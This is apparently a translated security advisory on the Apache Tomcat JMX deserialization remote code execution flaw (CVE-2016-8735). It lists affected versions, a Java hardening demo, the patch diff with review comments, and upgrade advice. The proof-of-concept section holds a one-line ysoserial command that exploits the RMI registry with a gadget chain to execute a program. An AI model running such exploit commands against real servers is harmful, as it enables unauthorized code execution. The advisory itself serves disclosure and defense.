[Vulnerability Alert] Apache Tomcat multiple-version remote code execution, CVE-2016-8735 (with PoC)

Original author of this article: 0c0c0f

Source: 安全客 (Anquanke)


Background


Tomcat is a Servlet container developed by the Jakarta project under the Apache Software Foundation. Following the technical specifications published by Sun Microsystems, it implements support for Servlets and JavaServer Pages (JSP) and adds some features specific to a web server, such as the Tomcat management and control platform, security realm management, and Tomcat valves. Tomcat is popular with developers because it uses few system resources at runtime, scales well, and supports features commonly needed by application systems, such as load balancing and mail services.

Vulnerability description


Oracle fixed the JMX deserialization vulnerability behind JmxRemoteLifecycleListener (CVE-2016-3427). Tomcat also uses the JmxRemoteLifecycleListener listener, but Tomcat did not adopt the corresponding fix promptly, so the same remote code execution vulnerability exists in Tomcat.

Affected versions:


Apache Tomcat 9.0.0.M1 to 9.0.0.M11

Apache Tomcat 8.5.0 to 8.5.6

Apache Tomcat 8.0.0.RC1 to 8.0.38

Apache Tomcat 7.0.0 to 7.0.72

Apache Tomcat 6.0.0 to 6.0.47

 

Affected scenario:


Zabbix 2.0 has built JMX monitoring into the system itself and no longer depends on third-party tools, which makes monitoring Tomcat and other Java applications much simpler. This article briefly describes the process by which Zabbix monitors Tomcat over JMX. Deployments monitored this way have Tomcat's JMX remote listener enabled, and that listener is the component affected here.

Proof of concept (PoC):


Test version: Tomcat 8.0.36

Add the configuration to conf/server.xml, add the catalina-jmx-remote.jar package, and modify the catalina script configuration.



F:\HackTools\EXP>java -cp ysoserial-master-v0.0.4.jar ysoserial.exploit.RMIRegistryExploit localhost 10001 Groovy1 calc.exe


This vulnerability has other exploitation paths as well and its impact is severe, so changing the JMX configuration to require password authentication is absolutely necessary! Note that authentication on its own does not close the hole, because the credentials object is deserialized before it is checked; the patch below therefore also restricts which types that object may have.
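To show what the credential-type restriction and password authentication do in practice, here is an added example written for this edit (it is not code from the original article or from the Tomcat project). It stands up a local JMX connector server the same way Tomcat's listener does, sets the jmx.remote.rmi.server.credential.types attribute that the patch introduces, adds a JMXAuthenticator, and then connects twice: once with the expected String[] credentials and once with an Integer standing in for an arbitrary object. The port, user name and password are constructed values for the demo.

```java
import java.lang.management.ManagementFactory;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.rmi.server.UnicastRemoteObject;
import java.util.Collections;
import java.util.HashMap;
import java.util.Map;
import javax.management.MBeanServer;
import javax.management.remote.JMXAuthenticator;
import javax.management.remote.JMXConnector;
import javax.management.remote.JMXConnectorFactory;
import javax.management.remote.JMXConnectorServer;
import javax.management.remote.JMXConnectorServerFactory;
import javax.management.remote.JMXPrincipal;
import javax.management.remote.JMXServiceURL;
import javax.security.auth.Subject;

public class HardenedJmxDemo {
    // Constructed values for this demo; they are not Tomcat defaults.
    static final int REGISTRY_PORT = 10001;
    static final String USER = "monitor";
    static final String PASSWORD = "constructed-demo-password";

    public static void main(String[] args) throws Exception {
        Registry registry = LocateRegistry.createRegistry(REGISTRY_PORT);
        MBeanServer mbs = ManagementFactory.getPlatformMBeanServer();

        Map<String, Object> env = new HashMap<>();
        // Same attribute the Tomcat patch sets: only a String[] or a String may arrive
        // as the credentials object; anything else is refused during unmarshalling.
        env.put("jmx.remote.rmi.server.credential.types",
                new String[] { String[].class.getName(), String.class.getName() });
        // Password check; this runs only after the credentials object passed the type check.
        JMXAuthenticator authenticator = credentials -> {
            if (credentials instanceof String[]) {
                String[] pair = (String[]) credentials;
                if (pair.length == 2 && USER.equals(pair[0]) && PASSWORD.equals(pair[1])) {
                    return new Subject(true, Collections.singleton(new JMXPrincipal(USER)),
                            Collections.emptySet(), Collections.emptySet());
                }
            }
            throw new SecurityException("Invalid credentials");
        };
        env.put(JMXConnectorServer.AUTHENTICATOR, authenticator);

        JMXServiceURL url = new JMXServiceURL(
                "service:jmx:rmi:///jndi/rmi://localhost:" + REGISTRY_PORT + "/jmxrmi");
        JMXConnectorServer cs = JMXConnectorServerFactory.newJMXConnectorServer(url, env, mbs);
        cs.start();
        try {
            System.out.println("String[] credentials: " + attempt(url, new String[] { USER, PASSWORD }));
            System.out.println("Integer credentials:  " + attempt(url, Integer.valueOf(42)));
        } finally {
            cs.stop();
            UnicastRemoteObject.unexportObject(registry, true);
        }
    }

    /** Connects with the given credentials object and reports whether the server accepted it. */
    static String attempt(JMXServiceURL url, Object credentials) {
        Map<String, Object> clientEnv = new HashMap<>();
        clientEnv.put(JMXConnector.CREDENTIALS, credentials);
        try (JMXConnector c = JMXConnectorFactory.connect(url, clientEnv)) {
            return "accepted (" + c.getMBeanServerConnection().getMBeanCount() + " MBeans visible)";
        } catch (Exception e) {
            return "rejected: " + e.getClass().getSimpleName() + ": " + e.getMessage();
        }
    }
}
```

Run it with a JRE that understands the credential.types attribute (the JDK fix for CVE-2016-3427 referenced above introduced it; JDK 10 and later mark it deprecated in favour of jmx.remote.rmi.server.credentials.filter.pattern but still honour it). The first attempt prints "accepted" and the second is rejected before the authenticator runs. On an older JRE the Integer is still refused, but only by the authenticator, after it has already been deserialized, which is exactly the window the vulnerability lives in. For Tomcat itself the equivalent configuration is the JmxRemoteLifecycleListener element in server.xml together with the standard com.sun.management.jmxremote.authenticate, password.file and access.file system properties in the catalina startup options.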

Patch code:


Diff of /tomcat/trunk/webapps/docs/changelog.xml

---?tomcat/trunk/webapps/docs/changelog.xml??? 2016/11/02?11:57:28??? 1767643
+++?tomcat/trunk/webapps/docs/changelog.xml??? 2016/11/02?11:57:36??? 1767644
@@?-97,6?+97,10?@@
?????????StoreConfig?component?includes?the?executor?name?when?writing?the
?????????Connector?configuration.?(markt)
???????</fix>
+??????<fix>
+????????When?configuring?the?JMX?remote?listener,?specify?the?allowed?types?for
+????????the?credentials.?(markt)
+??????</fix>
?????</changelog>
???</subsection>
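Review bot: the changelog entry only describes the credential-type restriction, but the same revision (1767644, per the JmxRemoteLifecycleListener.java diff headers) also changes the registry binding from `server` to `server.toStub()`; add a sentence covering that second change so the changelog reflects everything this commit alters in the listener's behaviour.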

/tomcat/trunk/java/org/apache/catalina/mbeans/JmxRemoteLifecycleListener.java

---?tomcat/trunk/java/org/apache/catalina/mbeans/JmxRemoteLifecycleListener.java?? 2016/11/02?11:57:28??? 1767643
+++?tomcat/trunk/java/org/apache/catalina/mbeans/JmxRemoteLifecycleListener.java?? 2016/11/02?11:57:36??? 1767644
@@?-264,6?+264,10?@@
?????????????????serverCsf?=?new?RmiClientLocalhostSocketFactory(serverCsf);
?????????????}
?
+????????????env.put("jmx.remote.rmi.server.credential.types",?new?String[]?{
+????????????????????String[].class.getName(),
+????????????????????String.class.getName()?});
+
?????????????//?Populate?the?env?properties?used?to?create?the?server
?????????????if?(serverCsf?!=?null)?{
?????????????????env.put(RMIConnectorServer.RMI_CLIENT_SOCKET_FACTORY_ATTRIBUTE,?serverCsf);
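Review bot: the restriction added at `env.put("jmx.remote.rmi.server.credential.types", ...)` only takes effect on a JRE that recognises this attribute (it arrived with the Oracle fix for CVE-2016-3427 that the advisory references); on an older runtime the map entry is ignored without any error and the listener keeps accepting arbitrary credential objects, so the listener documentation should state the minimum JRE, or the listener should log a warning when the fix cannot be relied on. The attribute name is also a bare string literal here; a named constant would avoid it drifting if it is referenced elsewhere.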
@@?-328,7?+332,7?@@
?????????????cs?=?new?RMIConnectorServer(serviceUrl,?theEnv,?server,
?????????????????????ManagementFactory.getPlatformMBeanServer());
?????????????cs.start();
-????????????registry.bind("jmxrmi",?server);
+????????????registry.bind("jmxrmi",?server.toStub());
?????????????log.info(sm.getString("jmxRemoteLifecycleListener.start",
?????????????????????Integer.toString(theRmiRegistryPort),
?????????????????????Integer.toString(theRmiServerPort),?serverName));
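Review bot: `server.toStub()` declares `throws IOException`, whereas the previous `registry.bind("jmxrmi", server)` only raised `RemoteException` and `AlreadyBoundException`; the enclosing try/catch is outside this hunk, so confirm it handles a plain `IOException` (a catch clause for `RemoteException` alone would not cover this line). `toStub()` also only succeeds once the server has been exported, which `cs.start()` on the preceding line guarantees; a short comment stating that ordering dependency would stop a later reordering from breaking the bind.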

Solution:


Upgrade to an unaffected version.

Unaffected versions:

Upgrade to Apache Tomcat 9.0.0.M13 or later (Apache Tomcat 9.0.0.M12 has the fix but was not released)

Upgrade to Apache Tomcat 8.5.8 or later (Apache Tomcat 8.5.7 has the fix but was not released)

Upgrade to Apache Tomcat 8.0.39 or later

Upgrade to Apache Tomcat 7.0.73 or later

Upgrade to Apache Tomcat 6.0.48 or later

Vulnerability references:


http://seclists.org/oss-sec/2016/q4/502

http://engineering.pivotal.io/post/java-deserialization-jmx/

http://svn.apache.org/viewvc?view=revision&revision=1767644

Original article: http://bobao.#/learning/detail/3260.html
